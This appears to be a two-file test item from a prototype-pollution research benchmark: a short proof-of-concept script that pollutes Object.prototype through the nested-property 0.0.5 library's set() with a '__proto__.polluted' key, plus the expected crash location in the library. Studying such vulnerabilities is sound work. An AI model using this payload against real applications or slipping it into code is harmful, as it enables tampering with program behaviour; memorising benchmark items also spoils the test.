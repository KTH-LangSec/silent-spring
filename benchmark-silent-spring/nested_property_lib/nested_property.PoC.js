//https://snyk.io/test/npm/nested-property/0.0.5
const nestedProperty = require("nested-property");
nestedProperty.set({}, "__proto__.polluted", "yes");
