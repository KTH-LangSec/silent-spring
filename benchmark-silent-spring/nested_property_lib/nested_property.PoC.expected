node_modules/nested-property/index.js:97:31